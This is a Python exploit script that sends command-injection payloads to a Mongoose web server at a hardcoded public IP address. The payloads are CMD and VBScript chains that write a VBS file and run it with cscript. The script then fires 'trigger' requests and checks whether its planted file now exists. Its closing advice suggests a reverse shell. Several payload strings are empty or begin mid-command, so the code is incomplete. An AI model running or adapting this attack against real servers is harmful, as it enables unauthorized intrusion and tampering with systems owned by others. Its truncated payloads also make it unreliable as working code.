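#!/usr/bin/env python3
# Mongoose File Creation Exploit
# For authorized penetration testing
r"""Proof-of-concept that tries to make a Mongoose web server write a file.

Flow, as far as this file shows it:
  1. send GET requests whose request-target is a payload string, not a path;
  2. send plain GETs to a fixed list of paths (the "trigger" requests);
  3. fetch the file over HTTP to see whether it now exists.

The payload literals in this copy are incomplete: the primary and "Python"
payloads are empty strings and the other two begin mid-command, so stage 1 as
captured sends an empty request-target. How injected text would come to be
executed on the server is not visible in this file.

Observable artefacts, taken from the strings below:
  - request lines containing `);?>`, `&&echo`, `cscript` or `createfile.vbs`;
  - one client requesting /, /index.html, /test.php, /admin,
    /cgi-bin/test.cgi and /favicon.ico in order, three rounds in a row;
  - file writes to C:\temp\createfile.vbs and C:\Mongoose\<filename>.
"""

import socket
import time
import sys


def _send_get(target_ip, target_port, request_target, timeout=10, recv_size=1024):
    """Send one raw ``GET <request_target> HTTP/1.1`` and return the first reply bytes.

    The socket is closed on every path (the original leaked it whenever
    connect/send/recv raised), and ``sendall`` is used so a partial write
    cannot truncate the request. Only a single ``recv`` of ``recv_size``
    bytes is performed; the rest of the response is not read.
    """
    request = f"GET {request_target} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n"
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        sock.connect((target_ip, int(target_port)))
        sock.sendall(request.encode())
        return sock.recv(recv_size)


def _split_response(text):
    """Return ``(status_code, body)`` from decoded response text.

    ``status_code`` is "" when the first line is not an HTTP status line and
    ``body`` is "" when the header/body separator was not received.
    """
    head, sep, body = text.partition("\r\n\r\n")
    fields = head.split(None, 2)
    status = fields[1] if len(fields) >= 2 and fields[0].startswith("HTTP/") else ""
    return status, (body if sep else "")


def inject_file_creation_payload(target_ip, target_port, filename="baba.html", content="win"):
    """Send the primary payload as the request-target of a single GET.

    Returns True when the request was sent and a reply was read, False on any
    exception. The return value says nothing about whether the server acted
    on the payload; the reply is not inspected.
    """
    print(f"[*] Injecting payload to create {filename} with content: '{content}'")

    # PowerShell payload to create file
    # The literal is empty in this copy, so the request line is "GET  HTTP/1.1".
    payload = ""

    try:
        _send_get(target_ip, target_port, payload)
        print("[+] File creation payload injected successfully")
        return True
    except Exception as e:
        print(f"[-] Failed to inject file creation payload: {e}")
        return False


def inject_alternative_file_payloads(target_ip, target_port, filename="baba.html", content="win"):
    """Send three further payload variants, one GET each; failures are only logged.

    Each variant is attempted independently, so one failing connection does
    not stop the others. Nothing is returned.
    """
    print("[*] Injecting alternative file creation payloads...")

    # CMD echo method (literal starts mid-command in this copy)
    cmd_payload = f"\\tC:\\\\Mongoose\\\\{filename}\");?>"

    # Python method (literal is empty in this copy)
    python_payload = ""

    # VBScript method via CMD: writes C:\temp\createfile.vbs line by line,
    # then runs it with cscript (literal starts mid-command in this copy)
    vbs_payload = f"\\tC:\\\\temp\\\\createfile.vbs&&echo\\tSet\\ta=fs.CreateTextFile(^\"C:\\\\Mongoose\\\\{filename}^\",True)\\t>>\\tC:\\\\temp\\\\createfile.vbs&&echo\\ta.WriteLine(^\"{content}^\")\\t>>\\tC:\\\\temp\\\\createfile.vbs&&echo\\ta.Close\\t>>\\tC:\\\\temp\\\\createfile.vbs&&cscript\\tC:\\\\temp\\\\createfile.vbs\");?>"

    payloads = [
        ("CMD Echo", cmd_payload),
        ("Python", python_payload),
        ("VBScript", vbs_payload),
    ]

    for name, payload in payloads:
        try:
            _send_get(target_ip, target_port, payload)
            print(f"[+] {name} file creation payload injected")
        except Exception as e:
            print(f"[-] Failed to inject {name} payload: {e}")


def trigger_payload_execution(target_ip, target_port):
    """Request a fixed list of paths, pausing 0.5 s after each successful one.

    The replies are read and discarded. A failed request is logged and the
    loop moves on without the pause.
    """
    print("[*] Triggering payload execution...")

    endpoints = ["/", "/index.html", "/test.php", "/admin", "/cgi-bin/test.cgi", "/favicon.ico"]

    for i, endpoint in enumerate(endpoints):
        try:
            _send_get(target_ip, target_port, endpoint, timeout=5)
            print(f"[+] Trigger #{i+1} sent to {endpoint}")
            time.sleep(0.5)
        except Exception as e:
            print(f"[-] Trigger failed for {endpoint}: {e}")


def verify_file_creation(target_ip, target_port, filename="baba.html", content="win"):
    """Fetch ``/<filename>`` and report whether it holds the expected content.

    Returns True only for a 200 reply whose body contains ``content``.
    The original searched the whole reply (status line and headers included)
    for the fixed string "win" before looking at the status, so a 404 page or
    a header that happened to contain "win" was reported as success.
    Only the first 4096 bytes of the reply are examined.
    """
    print(f"[*] Attempting to verify creation of {filename}...")

    try:
        response = _send_get(target_ip, target_port, f"/{filename}", recv_size=4096)
    except Exception as e:
        print(f"[-] Failed to verify file creation: {e}")
        return False

    response_str = response.decode('utf-8', errors='ignore')
    status, body = _split_response(response_str)

    if status == "404":
        print("[-] File not found (404 error)")
        return False
    if status == "200" and content in body:
        print("[+] SUCCESS: File creation verified!")
        print(f" Content: {response_str[:100]}...")
        return True
    print(f"[!] File may exist but content differs. Response: {response_str[:100]}...")
    return False


def main():
    """Run the four stages in order against the fixed target below."""
    # The target is fixed in code: no argv handling exists even though `sys`
    # is imported, so changing the host means editing this file.
    target_ip = "82.150.175.250"
    target_port = "8080"
    filename = "baba.html"
    content = "win"

    print("="*70)
    print("MONGOOSE FILE CREATION EXPLOIT")
    print("="*70)
    print(f"Target: {target_ip}:{target_port}")
    print(f"File to create: {filename}")
    print(f"Content: '{content}'")
    print("")

    # Inject primary PowerShell file creation payload
    print("[STAGE 1] Injecting primary file creation payload...")
    if not inject_file_creation_payload(target_ip, target_port, filename, content):
        # Logged only; the remaining stages still run, as in the original.
        print("[-] Failed to inject primary payload")

    # Inject alternative payloads for better compatibility
    print("[STAGE 2] Injecting alternative file creation payloads...")
    inject_alternative_file_payloads(target_ip, target_port, filename, content)

    # Multiple triggers to activate payloads
    print("[STAGE 3] Triggering payload execution...")
    for i in range(3):
        print(f"[*] Execution round {i+1}/3")
        trigger_payload_execution(target_ip, target_port)
        time.sleep(3)

    # Wait a moment for file creation
    print("[*] Waiting 10 seconds for file creation...")
    time.sleep(10)

    # Verify file creation against the same content that was requested
    print("[STAGE 4] Verifying file creation...")
    if verify_file_creation(target_ip, target_port, filename, content):
        print("\n[+] EXPLOIT SUCCESSFUL!")
        print(f"[*] File '{filename}' with content '{content}' created on target")
        print(f"[*] Access it at: http://{target_ip}:{target_port}/{filename}")
    else:
        print("\n[-] File creation could not be verified")
        print("[*] Possible reasons:")
        print(" 1. Payload execution failed")
        print(" 2. Insufficient privileges")
        print(" 3. File path is incorrect")
        print(" 4. Antivirus/security software blocked the operation")
        print(" 5. Target directory is not writable")
        print("")
        print("[*] Try these troubleshooting steps:")
        print(" - Check if C:\\Mongoose directory exists and is writable")
        print(" - Try creating file in web root directory")
        print(" - Use reverse shell to manually create the file")


if __name__ == "__main__":
    main()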